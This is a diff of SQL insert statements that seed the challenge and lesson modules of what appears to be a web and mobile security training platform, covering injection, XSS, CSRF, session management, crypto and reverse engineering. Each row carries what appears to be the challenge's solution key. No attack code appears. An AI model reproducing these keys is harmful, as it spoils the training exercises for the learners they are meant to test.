+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('52885a3db5b09adc24f38bc453fe348f850649b3', 'Reverse Engineering 1', 'reverse.engineering.1', 'challenge', 'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'christopherjenkins', '072a9e4fc888562563adf8a89fa55050e3e1cfbbbe1d597b0537513ac8665295', 'open', '85', '50', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('b6432a6b5022cb044e9946315c44ab262ab59e88', 'Unvalidated Redirects and Forwards', 'unvalidated.redirects.and.forwards', 'lesson', 'Unvalidated Redirects and Forwards', 'unvalidated.redirects.and.forwards', '658c43abcf81a61ca5234cfd7a2', 'f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f', 'open', '86', '45', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('335440fef02d19259254ed88293b62f31cccdd41', 'Client Side Injection', 'client.side.injection', 'lesson', 'Mobile Injection', 'mobile.injection', 'VolcanicEruptionsAbruptInterruptions', 'f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1', 'open', '87', '50', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('f771a10efb42a79a9dba262fd2be2e44bf40b66d', 'SQL Injection 2', 'sql.injection.2', 'challenge', 'Injection', 'injection', 'f62abebf5658a6a44c5c9babc7865110c62f5ecd9d0a7052db48c4dbee0200e3', 'ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b', 'open', '88', '45', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('d7eaeaa1cc4f218abd86d14eefa183a0f8eb6298', 'NoSQL Injection One', 'nosql.injection.one', 'challenge', 'Injection', 'injection', 'c09f32d4c3dd5b75f04108e5ffc9226cd8840288a62bdaf9dc65828ab6eaf86a', 'd63c2fb5da9b81ca26237f1308afe54491d1bacf9fffa0b21a072b03c5bafe66', 'open', '89', '45', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('0cdd1549e7c74084d7059ce748b93ef657b44457', 'Poor Authentication', 'poor.authentication', 'lesson', 'Mobile Poor Authentication', 'mobile.poor.authentication', 'UpsideDownPizzaDip', '77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e', 'open', '90', '50', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('ef6496892b8e48ac2f349cdd7c8ecb889fc982af', 'Broken Crypto', 'broken.crypto', 'lesson', 'Mobile Broken Crypto', 'mobile.broken.crypto', '33edeb397d665ed7d1a580f3148d4b2f', '911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212', 'open', '97', '50', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('f16bf2ab1c1bf400d36330f91e9ac6045edcd003', 'Reverse Engineering 2', 'reverse.engineering.2', 'challenge', 'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'FireStoneElectric', '5bc811f9e744a71393a277c51bfd8fbb5469a60209b44fa3485c18794df4d5b1', 'open', '98', '50', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('c685f8102ae0128c2ab342df64699bb8209a0839', 'SQL Injection Escaping', 'sql.injection.escaping', 'challenge', 'Injection', 'injection', '0dcf9078ba5d878f9e23809ac8f013d1a08fdc8f12c5036f1a4746dbe86c0aac', '8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4', 'open', '99', '50', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('b70a84f159876bb9885b6e0087d22f0a52abbfcf', 'Session Management Challenge 2', 'session.management.challenge.2', 'challenge', 'Session Management', 'session.management', '4ba31e5ffe29de092fe1950422a', 'd779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7', 'open', '105', '55', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('20e755179a5840be5503d42bb3711716235005ea', 'CSRF 1', 'csrf.1', 'challenge', 'CSRF', 'csrf', '7639c952a191d569a0c741843b599604c37e33f9f5d8eb07abf0254635320b07', 's74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52', 'open', '106', '55', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e', 'Session Management Challenge 3', 'session.management.challenge.3', 'challenge', 'Session Management', 'session.management', 'e62008dc47f5eb065229d48963', 't193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3', 'open', '115', '60', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('307f78f18fd6a87e50ed6705231a9f24cd582574', 'Insecure Data Storage 1', 'insecure.data.storage.1', 'challenge', 'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'WarshipsAndWrenches', '362f84cf26bf96aeae358d5d0bbee31e9291aaa5367594c29b3af542a7572c01', 'open', '116', '60', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('3f010a976bcbd6a37fba4a10e4a057acc80bdc09', 'Broken Crypto 1', 'broken.crypto.1', 'challenge', 'Mobile Broken Crypto', 'mobile.broken.crypto', 'd1f2df53084b970ab538457f5af34c8b', 'd2f8519f8264f9479f56165465590b499ceca941ab848805c00f5bf0a40c9717', 'open', '117', '60', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('d4e2c37d8f1298fcaf4edcea7292cb76e9eab09b', 'Cross Site Scripting 2', 'cross.site.scripting.2', 'challenge', 'XSS', 'xss', '495ab8cc7fe9532c6a75d378de', 't227357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888', 'open', '119', '60', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('9e46e3c8bde42dc16b9131c0547eedbf265e8f16', 'Reverse Engineering 3', 'reverse.engineering.3', 'challenge', 'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'C1babd72225f0e9934YZ8', 'dbae0baa3f71f196c4d2c6c984d45a6c1c635bf1b482dccfe32e9b01b69a042b', 'open', '120', '76', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('0709410108f91314fb6f7721df9b891351eb2fcc', 'Insecure Cryptographic Storage Challenge 2', 'insecure.cryptographic.storage.challenge.2', 'challenge', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', 'TheVigenereCipherIsAmethodOfEncryptingAlphabeticTextByUsingPoly', 'h8aa0fdc145fb8089661997214cc0e685e5f86a87f30c2ca641e1dde15b01177', 'open', '126', '65', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('82e8e9e2941a06852b90c97087309b067aeb2c4c', 'Insecure Direct Object Reference Challenge 2', 'insecure.direct.object.reference.challenge.2', 'challenge', 'Insecure Direct Object References', 'insecure.direct.object.references', '1f746b87a4e3628b90b1927de23f6077abdbbb64586d3ac9485625da21921a0f', 'vc9b78627df2c032ceaf7375df1d847e47ed7abac2a4ce4cb6086646e0f313a4', 'open', '127', '65', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342', 'Cross Site Scripting 3', 'cross.site.scripting.3', 'challenge', 'XSS', 'xss', '6abaf491c9122db375533c04df', 'ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e', 'open', '128', '65', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('da3de2e556494a9c2fb7308a98454cf55f3a4911', 'Insecure Data Storage 2', 'insecure.data.storage.2', 'challenge', 'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'starfish123', 'ec09515a304d2de1f552e961ab769967bdc75740ad2363803168b7907c794cd4', 'open', '129', '65', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('cb7d696bdf88899e8077063d911fc8da14176702', 'Insecure Data Storage 3', 'insecure.data.storage.3', 'challenge', 'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'c4ptainBrunch', '11ccaf2f3b2aa4f88265b9cacb5e0ed26b11af978523e34528cf0bb9d32de851', 'open', '130', '60', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('de626470273c01388629e5a56ac6f17e2eef957b', 'Insecure Direct Object Reference Bank', 'insecure.direct.object.reference.bank', 'challenge', 'Insecure Direct Object References', 'insecure.direct.object.references', '4a1df02af317270f844b56edc0c29a09f3dd39faad3e2a23393606769b2dfa35', '1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c', 'open', '131', '60', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('f40b0cd5d45327c9426675313f581cf70c7c7c28', 'Unintended Data Leakage 1', 'unintended.data.leakage.1', 'challenge', 'Mobile Data Leakage', 'mobile.data.leakage', 'BagsofSalsa', '517622a535ff89f7d90674862740b48f53aad7b41390fe46c6f324fee748d136', 'open', '132', '60', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e', 'SQL Injection 3', 'sql.injection.3', 'challenge', 'Injection', 'injection', '9815 1547 3214 7569', 'b7327828a90da59df54b27499c0dc2e875344035e38608fcfb7c1ab8924923f6', 'open', '135', '70', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('94cd2de560d89ef59fc450ecc647ff4d4a55c15d', 'CSRF 2', 'csrf.2', 'challenge', 'CSRF', 'csrf', '45309dbaf8eaf6d1a5f1ecb1bf1b6be368a6542d3da35b9bf0224b88408dc001', 'z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e', 'open', '136', '70', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('5ca9115f3279b9b9f3308eb6a59a4fcd374846d6', 'CSRF 3', 'csrf.3', 'challenge', 'CSRF', 'csrf', '6bdbe1901cbe2e2749f347efb9ec2be820cc9396db236970e384604d2d55b62a', 'z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c', 'open', '137', '70', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('a3f7ffd0f9c3d15564428d4df0b91bd927e4e5e4', 'Client Side Injection 1', 'client.side.injection.1', 'challenge', 'Mobile Injection', 'mobile.injection', 'SourHatsAndAngryCats', '8855c8bb9df4446a546414562eda550520e29f7a82400a317c579eb3a5a0a8ef', 'open', '138', '70', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('cfbf7b915ee56508ad46ab79878f37fd9afe0d27', 'CSRF 4', 'csrf.4', 'challenge', 'CSRF', 'csrf', 'bb78f73c7efefec25e518c3a91d50d789b689c4515b453b6140a2e4e1823d203', '84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5', 'open', '139', '70', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('1e3c02ad49fa9a9e396a3b268d7da8f0b647d8f9', 'Unintended Data Leakage 2', 'unintended.data.leakage.2', 'challenge', 'Mobile Data Leakage', 'mobile.data.leakage', '627884736748', '85ceae7ec397c8f4448be51c33a634194bf5da440282227c15954bbdfb54f0c7', 'open', '140', '70', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('fcc1918e0a23b8420e173cf8029876cb887408d3', 'CSRF JSON', 'csrf.json', 'challenge', 'CSRF', 'csrf', 'f57f1377bd847a370d42e1410bfe48c9a3484e78d50e83f851b634fe77d41a6e', '2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb', 'open', '141', '70', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('ced925f8357a17cfe3225c6236df0f681b2447c4', 'Session Management Challenge 4', 'session.management.challenge.4', 'challenge', 'Session Management', 'session.management', '238a43b12dde07f39d14599a780ae90f87a23e', 'ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6', 'open', '145', '75', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('182f519ef2add981c77a584380f41875edc65a56', 'Cross Site Scripting 4', 'cross.site.scripting.4', 'challenge', 'XSS', 'xss', '515e05137e023dd7828adc03f639c8b13752fbdffab2353ccec', '06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751', 'open', '146', '75', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('e0ba96bb4c8d4cd2e1ff0a10a0c82b5362edf998', 'SQL Injection 4', 'sql.injection.4', 'challenge', 'Injection', 'injection', 'd316e80045d50bdf8ed49d48f130b4acf4a878c82faef34daff8eb1b98763b6f', '1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629', 'open', '147', '75', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('b3cfd5890649e6815a1c7107cc41d17c82826cfa', 'Insecure Cryptographic Storage Challenge 3', 'insecure.cryptographic.storage.challenge.3', 'challenge', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', 'THISISTHESECURITYSHEPHERDABCENCRYPTIONKEY', '2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1', 'open', '148', '75', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('63bc4811a2e72a7c833962e5d47a41251cd90de3', 'Broken Crypto 2', 'broken.crypto.2', 'challenge', 'Mobile Broken Crypto', 'mobile.broken.crypto', 'DancingRobotChilliSauce', 'fb5c9ce0f5539b737e534fd317befff7427f6610ed626dfd43abf35295f106bc', 'open', '149', '75', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('e635fce334aa61fdaa459c21c286d6332eddcdd3', 'Client Side Injection 2', 'client.side.injection.2', 'challenge', 'Mobile Injection', 'mobile.injection', 'BurpingChimneys', 'cfe68711def42bb0b201467b859322dd2750f633246842280dc68c858d208425', 'open', '155', '80', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('0a37cb9296ff3763f7f3a45ff313bce47afa9384', 'CSRF 5', 'csrf.5', 'challenge', 'CSRF', 'csrf', '8f34078ef3e53f619618d9def1ede8a6a9117c77c2fad22f76bba633da83e6d4', '70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49', 'open', '156', '80', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('3b14ca3c8f9b90c9b2c8cd1fba9fa67add1272a3', 'Poor Data Validation 2', 'poor.data.validation.2', 'challenge', 'Poor Data Validation', 'poor.data.validation', '05adf1e4afeb5550faf7edbec99170b40e79168ecb3a5da19943f05a3fe08c8e', '20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5', 'open', '157', '80', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('ba6e65e4881c8499b5e53eb33b5be6b5d0f1fb2c', 'Poor Authentication 1', 'poor.authentication.1', 'challenge', 'Mobile Poor Authentication', 'mobile.poor.authentication', 'MegaKillerExtremeCheese', 'efa08298fc6a4add4b9a4bbdbbbb18ac934667971fa275bd7d234589bd8a8467', 'open', '160', '60', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('c7ac1e05faa2d4b1016cfcc726e0689419662784', 'Failure to Restrict URL Access 2', 'failure.to.restrict.url.access.2', 'challenge', 'Failure to Restrict URL Access', 'failure.to.restrict.url.access', '40b675e3d404c52b36abe31d05842b283975ec62e8', '278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa', 'open', '165', '85', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('fccf8e4d5372ee5a73af5f862dc810545d19b176', 'Cross Site Scripting 5', 'cross.site.scripting.5', 'challenge', 'XSS', 'xss', '7d7cc278c30cca985ab027e9f9e09e2f759e5a3d1f63293', 'f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671', 'open', '166', '85', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('064e28ea4b2f7708b8cb4495d9db1a5e05decdb8', 'Poor Authentication 2', 'poor.authentication.2','challenge', 'Mobile Poor Authentication', 'mobile.poor.authentication', 'MoreRobotsNotEnoughNuts', '808d8372ec7bc7e37e8e3b30d313cb47763926065a4623b27b24cc537fee72a7', 'open', '173', '70', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('a84bbf8737a9ca749d81d5226fc87e0c828138ee', 'SQL Injection 5', 'sql.injection.5', 'challenge', 'Injection', 'injection', '343f2e424d5d7a2eff7f9ee5a5a72fd97d5a19ef7bff3ef2953e033ea32dd7ee', '8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62', 'open', '175', '90', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('04a5bd8656fdeceac26e21ef6b04b90eaafbd7d5', 'CSRF 6', 'csrf.6', 'challenge', 'CSRF', 'csrf', 'df611f54325786d42e6deae8bbd0b9d21cf2c9282ec6de4e04166abe2792ac00', '2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569', 'open', '176', '90', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('dc89383763c68cba0aaa1c6f3fd4c17e9d49a805', 'SQL Injection Stored Procedure', 'sql.injection.stored.procedure', 'challenge', 'Injection', 'injection', 'd9c5757c1c086d02d491cbe46a941ecde5a65d523de36ac1bfed8dd4dd9994c8', '7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7', 'open', '177', '90', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('6a411618a05e3cef8ccb6f3d7914412d27782a88', 'Content Provider Leakage 1', 'content.provider.leakage.1', 'challenge', 'Mobile Content Provider', 'mobile.content.provider', 'BlueCupNoPartySorry', '2a845ec1943a6342956a48cdc8ca60f40036b68a810109d0b9d2a35271377980', 'open', '178', '75', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('3b1af0ad239325bf494c6e606585320b31612e72', 'Broken Crypto 3', 'broken.crypto.3', 'challenge', 'Mobile Broken Crypto', 'mobile.broken.crypto', 'ShaveTheSkies', 'f5a3f19dd44b53c6d29dda65fa90791bb312a3044b3110acb8a65d165376bf34', 'open', '180', '180', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('c6841bcc326c4bad3a23cd4fa6391eb9bdb146ed', 'Cross Site Scripting 6', 'cross.site.scripting.6', 'challenge', 'XSS', 'xss', 'c13e42171dbd41a7020852ffdd3399b63a87f5', 'd330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf', 'open', '185', '95', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('ad332a32a6af1f005f9c8d1e98db264eb2ae5dfe', 'SQL Injection 6', 'sql.injection.6', 'challenge', 'Injection', 'injection', '17f999a8b3fbfde54124d6e94b256a264652e5087b14622e1644c884f8a33f82', 'd0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2', 'open', '186', '95', 1, 0);
